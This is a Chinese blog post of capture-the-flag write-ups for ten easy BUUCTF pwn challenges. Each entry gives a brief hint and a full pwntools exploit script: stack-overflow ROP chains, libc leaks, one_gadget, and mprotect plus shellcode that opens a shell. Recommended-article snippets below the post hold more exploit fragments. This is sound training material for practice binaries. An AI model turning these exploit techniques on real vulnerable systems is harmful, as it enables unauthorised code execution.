BUUCTF pwn水题大赏(二)

最新推荐文章于 2023-01-13 10:30:22 发布
最新推荐文章于 2023-01-13 10:30:22 发布
阅读量191 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45878152/article/details/113617010
版权

BUUCTF pwn水题大赏

get_started_3dsctf_2016

利用 mprotect 函数修改 bss 段,写入 shellcode
exp:

from pwn import*
context(arch='i386',os='linux')
flag=0x80489A0
p=process('./get_started_3dsctf_2016')
#p=remote('node3.buuoj.cn',28114)
#gdb.attach(p)
mprotect=0x0806EC80
buf=0x80ec000
pop_3_ret=0x0804f460
read_addr=0x0806E140

payload='a'*56+p32(mprotect)+p32(pop_3_ret)+p32(buf)+p32(0x1000)+p32(0x7)+p32(read_addr)+p32(buf)+p32(0)+p32(buf)+p32(0x100)
p.sendline(payload)
shellcode=asm(shellcraft.sh())

p.sendline(shellcode)
p.interactive()

本地脚本就是普通的栈溢出,但是栈溢出脚本打不通远程

ciscn_2019_en_2

puts 泄露 libcgets 栈溢出
exp:

from pwn import*
from LibcSearcher import*
p=process('./ciscn_2019_en_2')
#p=remote('node3.buuoj.cn',27770)
elf=ELF('./ciscn_2019_en_2')
context.log_level = 'debug'
ret=0x00000000004006b9
pop_rdi=0x0000000000400c83
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_plt = elf.sym['main']

payload='a'*0x50+'a'*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_plt)
p.sendlineafter("choice!",'1')
p.sendline(payload)

puts_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00'))
print hex(puts_addr)

libc = LibcSearcher('puts',puts_addr)
libc_base=puts_addr-libc.dump('puts')
print hex(libc_base)
libc_sys=libc_base+libc.dump('system')
libc_sh=libc_base+libc.dump('str_bin_sh')

p.sendlineafter("choice!",'1')
payload2='a'*0x50+'a'*8+p64(ret)+p64(pop_rdi)+p64(libc_sh)+p64(libc_sys)+p64(0)
p.sendline(payload2)
p.interactive()

ciscn_2019_n_8

var[13]=17 时直接调用 system 函数
exp:

from pwn import*
p=process('./ciscn_2019_n_8')
#p=remote('node3.buuoj.cn',29317)
payload=p32(17)*14
p.sendline(payload)
p.interactive()

jarvisoj_level2

32位程序调用参数,栈溢出到 system 函数
exp:

from pwn import*
p=process('./level2')
#p=remote('node3.buuoj.cn',26054)
elf=ELF('./level2')
sys=elf.plt['system']

payload='a'*0x88+'a'*4+p32(sys)*2+p32(0x804A024)
p.sendline(payload)
p.interactive()

not_the_same_3dsctf_2016

栈溢出返回到 write ,通过 write 打印出在 bss 段上的 flag
exp:

from pwn import*
#p=process('./not_the_same_3dsctf_2016')
p=remote('node3.buuoj.cn',27211)
elf=ELF('./not_the_same_3dsctf_2016')
write=elf.sym['write']
flag=0x080ECA2D

payload='a'*0x2D+p32(0x080489A0)+p32(write)+p32(flag)+p32(1)+p32(flag)+p32(45)
p.sendline(payload)
p.interactive()

[BJDCTF 2nd]one_gadget

计算 libc 的基地址,然后 one_gadget
exp:

from pwn import*
p=remote('node3.buuoj.cn',27212)
elf=ELF('./one_gadget')
libc=ELF('libc-2.29.so')
one_gadget=[0xe237f,0xe2383,0xe2386,0x106ef8]

p.recvuntil('0x')
addr=int(p.recv(12),16)

libc_base=addr-libc.sym['printf']
print hex(libc_base)
one=libc_base+one_gadget[3]

p.recvuntil('Give me your one gadget:')
p.sendline(str(one))
#gdb.attach(p)
p.interactive()

bjdctf_2020_babystack

直接栈溢出跳转到 backdoor
exp:

from pwn import*
p=process('./bjdctf_2020_babystack2')
#p=remote('node3.buuoj.cn',25591)
backdoor=0x400726
ret=0x0000000000400599
pop_rdi=0x0000000000400893
elf=ELF('./bjdctf_2020_babystack2')
payload='a'*0x18+p64(ret)+p64(backdoor)
p.sendlineafter(':','-1')
p.sendline(payload)
p.interactive()

[HarekazeCTF2019]baby_rop

栈溢出调用 system 函数
exp:

from pwn import*
p=process('./babyrop')
#p=remote('node3.buuoj.cn',29059)
ret=0x0000000000400479
rdi=0x0000000000400683
elf=ELF('./babyrop')
sys=elf.plt['system']
payload='a'*0x10+'a'*8+p64(ret)+p64(rdi)+p64(0x601048)+p64(sys)*2
p.sendline(payload)
p.interactive()

jarvisoj_level2_x64

64位程序调用参数,栈溢出到 system 函数
exp:

from pwn import*
context.log_level = 'DEBUG'
#p=process('./level2_x64')
p=remote('node3.buuoj.cn',27144)
a=0x600A90
ret=0x00000000004004a1
pop_rdi=0x00000000004006b3
elf=ELF('./level2_x64')
sys_plt=elf.plt['system']
#gdb.attach(p)
payload='a'*0x88+p64(pop_rdi)+p64(a)+p64(sys_plt)
p.sendline(payload)
p.interactive()

ciscn_2019_n_5

/bin/sh 写到 bss 段上然后调用
exp:

from pwn import*
from LibcSearcher import*
context(arch='amd64',os='linux')
context.log_level = 'DEBUG'
p=process('./ciscn_2019_n_5')
#p=remote('node3.buuoj.cn',27170)
ret=0x00000000004004c9
pop_rdi=0x0000000000400713
shellcode = asm(shellcraft.sh())
p.sendlineafter('tell me your name',shellcode)
payload='a'*0x28+p64(0x601080)
p.sendlineafter('me?',payload)

p.interactive()
o琦野o
关注
专栏目录
buuctf ciscn_2019_n_5 ret2shellcode解题思路
weixin_45441024的博客
12-02 401
BUUCTF ciscn_2019_n_5 ret2shellcode check一下,最喜欢的一片红色,64位的程序 发现存在两次输入,那么我们就通过read将构造的shellcode写在栈上,然后在第次的时候通过构造溢出覆盖返回地址跳转到我们写入shellcode的这个地方,然后就开始构造吧: from pwn import * p=remote('node3.buuoj.cn',25157) sh="\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05\x48\x31
BUUCTF pwn水题大赏(三)
o琦野o的博客
02-03 379
BUUCTF pwn水题大赏21.铁人三项(第五赛区)_2018_rop22.bjdctf_2020_babyrop23.[BJDCTF 2nd]r2t424.[BJDCTF 2nd]test25.bjdctf_2020_babystack226.bjdctf_2020_babyrop227.bjdctf_2020_router28.others_babystack29.ciscn_2019_s_430.wdb2018_guess 21.铁人三项(第五赛区)_2018_rop 32位栈溢出,利用 write
[BUUCTF]PWN20——ciscn_2019_n_5
mcmuyanga的博客
09-07 1321
[BUUCTF]PWN20——ciscn_2019_n_5 附件 步骤: 例行检查,64位,没有开启任何保护 试运行一下程序,看看程序的执行情况 64位ida载入,找到main函数, 逻辑很简单,第一次让我们输入名字,限制输入长度为0x64,看一下name参数,发现name在全局变量bss段上 第次输入利用gets,没有限制长度,可以对v4造成溢出 利用过程 利用第一个输入点,往name参数里写入shellcode context(arch='amd64',os='linux')
Buuctf(pwn) ciscn_2019_n_5
半岛铁盒的博客
03-30 356
发现name在全局变量bss段上 可以利用 gets() 进行溢出 from pwn import* r=remote('node3.buuoj.cn',27785) context(arch='amd64',os='linux') 说明版本架构 shellcode=asm(shellcraft.sh()) 获取生成调用 bin/sh的 shellcode r.sendlineafter('tell me your name',shellcode) 往name里面写入shellcod...
[buuctf]ciscn_2019_n_5
逆向萌新的博客
07-03 796
[buuctf]ciscn_2019_n_5
[BUUCTF-pwn]——ciscn_2019_n_5
Y_peak的博客
02-11 594
[BUUCTF-pwn]——ciscn_2019_n_5 题目地址: https://buuoj.cn/challenges#ciscn_2019_n_5 老规矩还是先checksec 一下看看,64位的什么保护都没开.感觉应该要自己写shellcode了 在IDA中一看,果然如此.将准备好的shellcode 通过read写入 name . 然后通过gets进行栈溢出,使其,返回至name所在位置即可. shellcraft是pwntools中的一个模块是shellcode的生成器 所以shell
BUUCTF pwn水题大赏(五)
o琦野o的博客
02-03 294
BUUCTF pwn水题大赏41.ciscn_2019_s_3 41.ciscn_2019_s_3 srop ,要注意 rsp 指向的位置。 exp: from pwn import* context.log_level = 'DEBUG' context.arch = 'amd64' p = remote('node3.buuoj.cn',29369) #p = process('./ciscn_s_3') elf = ELF('./ciscn_s_3') syscall_ret = 0x400517
BUUCTF pwn水题大赏(六)
o琦野o的博客
03-11 343
BUUCTF pwn水题大赏suctf_2018_stack suctf_2018_stack 最最最最最最基本的栈溢出,也不知道为啥会这么高分。 exp: from pwn import* context.log_level = 'DEBUG' p=remote('node3.buuoj.cn',28582) #p=process('./SUCTF_2018_stack') elf=ELF('./SUCTF_2018_stack') payload = 'a'*0x28+p64(0x0040067A)
BUUCTF pwn水题大赏(七)(更新中)
o琦野o的博客
04-02 173
BUUCTF pwn水题大赏wustctf2020_getshell wustctf2020_getshell 简单 32 位栈溢出。 exp: from pwn import* context.log_level = 'DEBUG' p=remote('node3.buuoj.cn',28411) #p=process('./wustctf2020_getshell') backdoor = 0x0804851B payload = 'a'*0x18+'a'*4+p32(backdoor) p.sen
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2070
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
BUUCTF ciscn_2019_n_5
红叶的博客
10-31 1542
通过 puts 函数泄露真实地址,通过LibcSearcher查询Libc中后3位相同的Libc,dump并计算出 system 、 /bin/sh 的偏移。但是有个问题,如果本地打不进去可以尝试更换系统打,我的Kali打不进去换了个Ubuntu进去了。既然没开NX,那代表栈是可执行的,只需要构造shellcode即可直接获取shell。Payload_Name --- 用来跳过第一步的输入 name。Payload_Leak --- 用来进行溢出并获取地址。完全是裸的程序,基本上一点保护都没开。
BUUCTF 刷题 ciscn_2019_n_5
Helloity的博客
02-09 3225
先附上题目:BUUCTF在线评测 放到我们的虚拟机上checksec一下,64位程序,拥有RWX段。 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments 接下来放到IDA里f5一下,可以看到主函数读
buuctf|pwn-ciscn_2019_n_5-wp
l2645470582_的博客
11-09 239
1.例行检查保护机制 2.我们用64位的IDA打开该文件 shift+f12查看关键字符串,没有看到‘/bin/sh’可以拿到权限类的字符串 3.我们进入main函数看看 我们可以看出gets(text,name)这里造成溢出 我们再去看看name,然后发现name是bss段上的全局变量 又因为该题没有system("/bin/sh")的字样,所以我们可以向bss段写入shellcode拿到权限 shellcode = asm(shellcraft.sh()...
ciscn_2019_ne_5【BUUCTF
qq_41696518的博客
08-31 583
ciscn_2019_ne_5 BUUCTF
ciscn_2019_n_5
qq_39869547的博客
01-11 1026
very easy # -*- coding:utf-8 -*- from PwnContext.core import * local = 1 if local == 1 : p = remote('node3.buuoj.cn','25056') else: ctx.binary = binary ctx.remote_libc = debug_libc ctx...
[buuctf]ciscn_2019_ne_5
逆向萌新的博客
11-05 1661
buuctf ciscn_2019_ne_5题目分析
buuctf ciscn_2019_n_5 (ret2shellcode)
carol2358的博客
04-21 1017
无保护,程序直接提供了写入bss,ret2shellcode 一共两次输入,第一次写sh到bss,第次溢出text然后跳转到bss exp: from pwn import * from LibcSearcher import * local_file = './ciscn_2019_n_5' local_libc = '/usr/lib/x86_64-linux-gnu/libc-...
BUUCTFPWN】ciscn_2019_n_5 shellcode
m0_55368674的博客
01-13 439
BUUCTFPWN】ciscn_2019_n_5题解
BUUCTF pwn rip
最新发布
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值